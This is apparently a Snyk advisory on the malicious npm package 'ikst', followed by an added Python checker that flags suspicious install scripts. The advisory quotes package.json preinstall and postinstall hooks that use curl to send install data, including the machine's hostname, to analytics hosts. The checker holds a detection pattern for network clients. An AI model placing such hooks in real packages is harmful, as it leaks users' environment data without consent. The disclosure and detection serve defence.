Malicious Package Affecting ikst package, versions *
Exploit Maturity: Mature
Attack Complexity: Low
User Interaction: Required
Confidentiality: High
Integrity: High
Availability: High
Snyk ID: npm:ikst:20170917
Published: 17 Sep 2017
Disclosed: 8 Aug 2017
Credit: Jordan Wright
How to fix?
Avoid usage of this package altogether.
Overview
ikst is a malicious package that used npm install-time scripts to collect download metrics beyond what npm provides and send them to Google Analytics or Piwik, which is a privacy concern for users.
This is especially dangerous in production runtime environments, because install scripts can read environment variables, which there tend to consist of keys, passwords, tokens and other secrets.
Example:
{
  "name": "npm_scripts_test_metrics",
  "scripts": {
    "preinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=....'",
    "postinstall": "curl 'http://google-analytics.com/collect?v=1&t=event&tid=....'"
  }
},
{
  "name": "subtitles-lib",
  "scripts": {
    "postinstall": "bash -c 'curl \"http://*****.piwikpro.com/piwik.php?idsite=3&rec=1&action_name=$HOSTNAME\"'"
  }
}
The packages found using this install-script technique are:
npm_scripts_test_metrics
subtitles-lib
ikst
botbait
mktmpio
anarchy
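A defender-side check for the pattern shown above, added here as an illustration and not part of the Snyk advisory or of any of the listed packages: it parses a package.json manifest and flags install-time lifecycle scripts that reach out to the network or expand environment variables. The sample manifest, its hook list and the tracking host are constructed for this example.

```python
import json
import re

# npm lifecycle hooks that run automatically during `npm install`
# (assumption: the common set, not an exhaustive list of npm hooks).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Indicators of an install script phoning home: a network client or a URL,
# and shell/cmd expansions that would leak environment variables.
NETWORK_RE = re.compile(r"\b(curl|wget)\b|https?://", re.I)
ENV_RE = re.compile(r"\$\{?[A-Za-z_][A-Za-z0-9_]*\}?|%[A-Za-z_][A-Za-z0-9_]*%")


def audit_install_scripts(package_json: str) -> list:
    """Return (hook, reason) findings for suspicious install-time scripts."""
    manifest = json.loads(package_json)
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # e.g. "test" or "build" only run when invoked explicitly
        reasons = []
        if NETWORK_RE.search(cmd):
            reasons.append("network access during install")
        env_refs = sorted({m.strip("${}%") for m in ENV_RE.findall(cmd)})
        if env_refs:
            reasons.append("environment variables read: " + ", ".join(env_refs))
        if reasons:
            findings.append((hook, "; ".join(reasons)))
    return findings


# Constructed manifest modelled on the subtitles-lib example above;
# example.invalid is a placeholder host, not a real indicator.
SAMPLE = json.dumps({
    "name": "subtitles-lib",
    "scripts": {
        "postinstall": "bash -c 'curl \"http://example.invalid/piwik.php?idsite=3&rec=1&action_name=$HOSTNAME\"'",
        "test": "node test.js",
    },
})

if __name__ == "__main__":
    for hook, reason in audit_install_scripts(SAMPLE):
        print(f"{hook}: {reason}")
```

Pairing a check like this with `ignore-scripts=true` in .npmrc (or `npm install --ignore-scripts`) stops such hooks from running at all, at the cost of breaking packages that legitimately build during install.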